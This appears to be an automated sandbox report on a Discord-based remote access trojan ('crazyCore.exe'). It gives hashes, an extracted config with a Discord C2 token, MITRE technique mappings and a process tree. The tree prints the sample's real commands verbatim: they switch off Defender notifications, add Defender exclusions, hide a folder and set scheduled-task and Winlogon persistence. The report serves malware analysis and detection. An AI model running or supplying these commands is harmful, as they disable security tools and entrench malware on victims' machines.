discordrat | bb7d5bba57344040132c5ea0e3f0c503733497d2527bac12d520f24996ba18fb

Analysis

max time kernel
149s
max time network
152s
platform
windows11-21h2_x64
resource
win11-20240426-en
resource tags

arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
submitted
12-05-2024 19:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

crazyCore.exe
Size

21.8MB
MD5

e6f650829d0696bff1fac6d08b4cdf5f
SHA1

69e19b885dfc862771e94424a9bf037b484aff67
SHA256

bb7d5bba57344040132c5ea0e3f0c503733497d2527bac12d520f24996ba18fb
SHA512

77249c6139bcd72a5e018243ebbb3a3c3caeb1a9990b5f7478a425b0ab9d5f56db97a53845c88caff599a136dc8e542e7ef2761cf48a96e3cc1c25871b305d7a
SSDEEP

49152:FaMUa/U2bmMjbwsd8CCvpX4AjerBV1RphcNwhIF/7MoxYivZcuLH/vpJBXnv6eSx:P

Score

10^/10

discordrat evasion execution persistence rat rootkit stealer trojan

Malware Config

Extracted

Family

discordrat

Attributes

discord_token
MTIyNzk4ODU3OTk0MzQ0ODY5OA.GEjnSa.rCkhYiVecrt4rcdXOEEhOiD8PNZMRf86EQwBJY
server_id
1239256207454109748

Signatures

Discord RAT
A RAT written in C# using Discord as a C2.
stealer rootkit rat persistence discordrat

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe, C:\\ProgramData\\Nul\\RuntimeBroker.exe,"	reg.exe

Modifies Windows Defender notification settings 3 TTPs 2 IoCs

evasion trojan

Windows Service

T1543.003

Modify Registry

T1112

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
904	powershell.exe
2200	powershell.exe
1496	powershell.exe

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
3712	attrib.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
456	discord.com
458	discord.com
410	discord.com

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	crazyCore.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	crazyCore.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133600151421682510"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings	chrome.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\fncheats.zip:Zone.Identifier	chrome.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4640	vlc.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
5004	crazyCore.exe
1496	powershell.exe
1496	powershell.exe
2200	powershell.exe
2200	powershell.exe
904	powershell.exe
904	powershell.exe
5104	chrome.exe
5104	chrome.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4640	vlc.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 61 IoCs

pid	Process
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5004	crazyCore.exe
Token: SeDebugPrivilege	1496	powershell.exe
Token: SeDebugPrivilege	2200	powershell.exe
Token: SeIncreaseQuotaPrivilege	2200	powershell.exe
Token: SeSecurityPrivilege	2200	powershell.exe
Token: SeTakeOwnershipPrivilege	2200	powershell.exe
Token: SeLoadDriverPrivilege	2200	powershell.exe
Token: SeSystemProfilePrivilege	2200	powershell.exe
Token: SeSystemtimePrivilege	2200	powershell.exe
Token: SeProfSingleProcessPrivilege	2200	powershell.exe
Token: SeIncBasePriorityPrivilege	2200	powershell.exe
Token: SeCreatePagefilePrivilege	2200	powershell.exe
Token: SeBackupPrivilege	2200	powershell.exe
Token: SeRestorePrivilege	2200	powershell.exe
Token: SeShutdownPrivilege	2200	powershell.exe
Token: SeDebugPrivilege	2200	powershell.exe
Token: SeSystemEnvironmentPrivilege	2200	powershell.exe
Token: SeRemoteShutdownPrivilege	2200	powershell.exe
Token: SeUndockPrivilege	2200	powershell.exe
Token: SeManageVolumePrivilege	2200	powershell.exe
Token: 33	2200	powershell.exe
Token: 34	2200	powershell.exe
Token: 35	2200	powershell.exe
Token: 36	2200	powershell.exe
Token: SeIncreaseQuotaPrivilege	2200	powershell.exe
Token: SeSecurityPrivilege	2200	powershell.exe
Token: SeTakeOwnershipPrivilege	2200	powershell.exe
Token: SeLoadDriverPrivilege	2200	powershell.exe
Token: SeSystemProfilePrivilege	2200	powershell.exe
Token: SeSystemtimePrivilege	2200	powershell.exe
Token: SeProfSingleProcessPrivilege	2200	powershell.exe
Token: SeIncBasePriorityPrivilege	2200	powershell.exe
Token: SeCreatePagefilePrivilege	2200	powershell.exe
Token: SeBackupPrivilege	2200	powershell.exe
Token: SeRestorePrivilege	2200	powershell.exe
Token: SeShutdownPrivilege	2200	powershell.exe
Token: SeDebugPrivilege	2200	powershell.exe
Token: SeSystemEnvironmentPrivilege	2200	powershell.exe
Token: SeRemoteShutdownPrivilege	2200	powershell.exe
Token: SeUndockPrivilege	2200	powershell.exe
Token: SeManageVolumePrivilege	2200	powershell.exe
Token: 33	2200	powershell.exe
Token: 34	2200	powershell.exe
Token: 35	2200	powershell.exe
Token: 36	2200	powershell.exe
Token: SeIncreaseQuotaPrivilege	2200	powershell.exe
Token: SeSecurityPrivilege	2200	powershell.exe
Token: SeTakeOwnershipPrivilege	2200	powershell.exe
Token: SeLoadDriverPrivilege	2200	powershell.exe
Token: SeSystemProfilePrivilege	2200	powershell.exe
Token: SeSystemtimePrivilege	2200	powershell.exe
Token: SeProfSingleProcessPrivilege	2200	powershell.exe
Token: SeIncBasePriorityPrivilege	2200	powershell.exe
Token: SeCreatePagefilePrivilege	2200	powershell.exe
Token: SeBackupPrivilege	2200	powershell.exe
Token: SeRestorePrivilege	2200	powershell.exe
Token: SeShutdownPrivilege	2200	powershell.exe
Token: SeDebugPrivilege	2200	powershell.exe
Token: SeSystemEnvironmentPrivilege	2200	powershell.exe
Token: SeRemoteShutdownPrivilege	2200	powershell.exe
Token: SeUndockPrivilege	2200	powershell.exe
Token: SeManageVolumePrivilege	2200	powershell.exe
Token: 33	2200	powershell.exe
Token: 34	2200	powershell.exe

Suspicious use of FindShellTrayWindow 42 IoCs

pid	Process
4640	vlc.exe
4640	vlc.exe
4640	vlc.exe
4640	vlc.exe
4640	vlc.exe
4640	vlc.exe
4640	vlc.exe
4640	vlc.exe
4640	vlc.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe

Suspicious use of SendNotifyMessage 20 IoCs

pid	Process
4640	vlc.exe
4640	vlc.exe
4640	vlc.exe
4640	vlc.exe
4640	vlc.exe
4640	vlc.exe
4640	vlc.exe
4640	vlc.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe
5104	chrome.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4640	vlc.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5004 wrote to memory of 3520	5004	crazyCore.exe	83
PID 5004 wrote to memory of 3520	5004	crazyCore.exe	83
PID 3520 wrote to memory of 1880	3520	cmd.exe	85
PID 3520 wrote to memory of 1880	3520	cmd.exe	85
PID 3520 wrote to memory of 1888	3520	cmd.exe	86
PID 3520 wrote to memory of 1888	3520	cmd.exe	86
PID 3520 wrote to memory of 3712	3520	cmd.exe	87
PID 3520 wrote to memory of 3712	3520	cmd.exe	87
PID 3520 wrote to memory of 1496	3520	cmd.exe	88
PID 3520 wrote to memory of 1496	3520	cmd.exe	88
PID 5004 wrote to memory of 2204	5004	crazyCore.exe	89
PID 5004 wrote to memory of 2204	5004	crazyCore.exe	89
PID 2204 wrote to memory of 2200	2204	cmd.exe	91
PID 2204 wrote to memory of 2200	2204	cmd.exe	91
PID 2204 wrote to memory of 3148	2204	cmd.exe	93
PID 2204 wrote to memory of 3148	2204	cmd.exe	93
PID 2204 wrote to memory of 5000	2204	cmd.exe	94
PID 2204 wrote to memory of 5000	2204	cmd.exe	94
PID 2204 wrote to memory of 2148	2204	cmd.exe	95
PID 2204 wrote to memory of 2148	2204	cmd.exe	95
PID 2204 wrote to memory of 904	2204	cmd.exe	96
PID 2204 wrote to memory of 904	2204	cmd.exe	96
PID 2204 wrote to memory of 1568	2204	cmd.exe	97
PID 2204 wrote to memory of 1568	2204	cmd.exe	97
PID 2204 wrote to memory of 252	2204	cmd.exe	98
PID 2204 wrote to memory of 252	2204	cmd.exe	98
PID 5104 wrote to memory of 3820	5104	chrome.exe	100
PID 5104 wrote to memory of 3820	5104	chrome.exe	100
PID 5104 wrote to memory of 2076	5104	chrome.exe	101
PID 5104 wrote to memory of 2076	5104	chrome.exe	101
PID 5104 wrote to memory of 2076	5104	chrome.exe	101
PID 5104 wrote to memory of 2076	5104	chrome.exe	101
PID 5104 wrote to memory of 2076	5104	chrome.exe	101
PID 5104 wrote to memory of 2076	5104	chrome.exe	101
PID 5104 wrote to memory of 2076	5104	chrome.exe	101
PID 5104 wrote to memory of 2076	5104	chrome.exe	101
PID 5104 wrote to memory of 2076	5104	chrome.exe	101
PID 5104 wrote to memory of 2076	5104	chrome.exe	101
PID 5104 wrote to memory of 2076	5104	chrome.exe	101
PID 5104 wrote to memory of 2076	5104	chrome.exe	101
PID 5104 wrote to memory of 2076	5104	chrome.exe	101
PID 5104 wrote to memory of 2076	5104	chrome.exe	101
PID 5104 wrote to memory of 2076	5104	chrome.exe	101
PID 5104 wrote to memory of 2076	5104	chrome.exe	101
PID 5104 wrote to memory of 2076	5104	chrome.exe	101
PID 5104 wrote to memory of 2076	5104	chrome.exe	101
PID 5104 wrote to memory of 2076	5104	chrome.exe	101
PID 5104 wrote to memory of 2076	5104	chrome.exe	101
PID 5104 wrote to memory of 2076	5104	chrome.exe	101
PID 5104 wrote to memory of 2076	5104	chrome.exe	101
PID 5104 wrote to memory of 2076	5104	chrome.exe	101
PID 5104 wrote to memory of 2076	5104	chrome.exe	101
PID 5104 wrote to memory of 2076	5104	chrome.exe	101
PID 5104 wrote to memory of 2076	5104	chrome.exe	101
PID 5104 wrote to memory of 2076	5104	chrome.exe	101
PID 5104 wrote to memory of 2076	5104	chrome.exe	101
PID 5104 wrote to memory of 2076	5104	chrome.exe	101
PID 5104 wrote to memory of 2076	5104	chrome.exe	101
PID 5104 wrote to memory of 2076	5104	chrome.exe	101
PID 5104 wrote to memory of 2280	5104	chrome.exe	102
PID 5104 wrote to memory of 2280	5104	chrome.exe	102
PID 5104 wrote to memory of 2388	5104	chrome.exe	103
PID 5104 wrote to memory of 2388	5104	chrome.exe	103
PID 5104 wrote to memory of 2388	5104	chrome.exe	103

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3712	attrib.exe

C:\Users\Admin\AppData\Local\Temp\crazyCore.exe
"C:\Users\Admin\AppData\Local\Temp\crazyCore.exe"
1⤵
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5004
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rmdir /s /q \\.\C:\ProgramData\Nul & reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableNotifications /t REG_DWORD /d 1 /f /reg:64 & reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter" /v Enabled /t REG_DWORD /d 0 /f /reg:64 & mkdir \\.\C:\ProgramData\Nul & attrib +r +h +s \\.\C:\ProgramData\Nul & powershell -Command Add-MpPreference -ExclusionPath @('C:\ProgramData', 'C:\Users\Admin\AppData\Local\Temp')
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3520
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableNotifications /t REG_DWORD /d 1 /f /reg:64
    3⤵
    - Modifies Windows Defender notification settings
    PID:1880
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter" /v Enabled /t REG_DWORD /d 0 /f /reg:64
    3⤵
    PID:1888
- - C:\Windows\system32\attrib.exe
    attrib +r +h +s \\.\C:\ProgramData\Nul
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:3712
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath @('C:\ProgramData', 'C:\Users\Admin\AppData\Local\Temp')
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1496
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c powershell -Command Register-ScheduledTask -TaskName "MicrosoftNulService" -Action (New-ScheduledTaskAction -Execute "C:\ProgramData\Nul\RuntimeBroker.exe") -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0 -Priority 1 -Hidden -DisallowHardTerminate -DontStopOnIdleEnd) -RunLevel Highest -Force & reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Windows\system32\userinit.exe, C:\ProgramData\Nul\RuntimeBroker.exe," /f /reg:64 & echo newline & echo --NOTIFICATIONS-- & reg query "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /reg:64 & reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter" /reg:64 & echo newline & echo --EXCLUSIONS-- & powershell -Command $exclusions = Get-MpPreference; Write-Host "Extension:"; $exclusions.ExclusionExtension; Write-Host "IpAddress:"; $exclusions.ExclusionIpAddress; Write-Host "Path:"; $exclusions.ExclusionPath; Write-Host "Process:"; $exclusions.ExclusionProcess; & echo newline & echo --NUL FOLDER-- & dir "\\.\C:\ProgramData\Nul" /A /AH /AS /B & echo newline & echo --STARTUPS-- & echo Task Scheduler: && schtasks /query /v /fo csv /nh /tn "MicrosoftNulService" & echo Winlogon: && reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2204
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Register-ScheduledTask -TaskName "MicrosoftNulService" -Action (New-ScheduledTaskAction -Execute "C:\ProgramData\Nul\RuntimeBroker.exe") -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0 -Priority 1 -Hidden -DisallowHardTerminate -DontStopOnIdleEnd) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2200
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Windows\system32\userinit.exe, C:\ProgramData\Nul\RuntimeBroker.exe," /f /reg:64
    3⤵
    - Modifies WinLogon for persistence
    PID:3148
- - C:\Windows\system32\reg.exe
    reg query "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /reg:64
    3⤵
    PID:5000
- - C:\Windows\system32\reg.exe
    reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter" /reg:64
    3⤵
    PID:2148
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command $exclusions = Get-MpPreference; Write-Host "Extension:"; $exclusions.ExclusionExtension; Write-Host "IpAddress:"; $exclusions.ExclusionIpAddress; Write-Host "Path:"; $exclusions.ExclusionPath; Write-Host "Process:"; $exclusions.ExclusionProcess;
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:904
- - C:\Windows\system32\schtasks.exe
    schtasks /query /v /fo csv /nh /tn "MicrosoftNulService"
    3⤵
    PID:1568
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit
    3⤵
    PID:252

C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\PushRequest.MTS"
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4640

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5104
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb0371ab58,0x7ffb0371ab68,0x7ffb0371ab78
  2⤵
  PID:3820
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1564 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:2
  2⤵
  PID:2076
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:8
  2⤵
  PID:2280
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2188 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:8
  2⤵
  PID:2388
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3160 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:4632
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3236 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:3580
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3872 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:3256
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4472 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:8
  2⤵
  PID:4520
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4448 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:8
  2⤵
  PID:3720
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4892 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:8
  2⤵
  PID:2628
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5008 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:8
  2⤵
  PID:1048
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5024 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:8
  2⤵
  PID:1856
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=2856 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:904
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3148 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:3564
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4432 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:2996
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3292 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:3792
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=1520 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:2420
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=1524 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:2596
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=5048 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:3060
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=5276 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:228
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=5484 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:1
  2⤵
  PID:2028
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5712 --field-trial-handle=1800,i,12320736709495002,15135906437013505079,131072 /prefetch:8
  2⤵
  - NTFS ADS
  PID:4464
- C:\Program Files\Google\Chrome\Application\chrome.exe
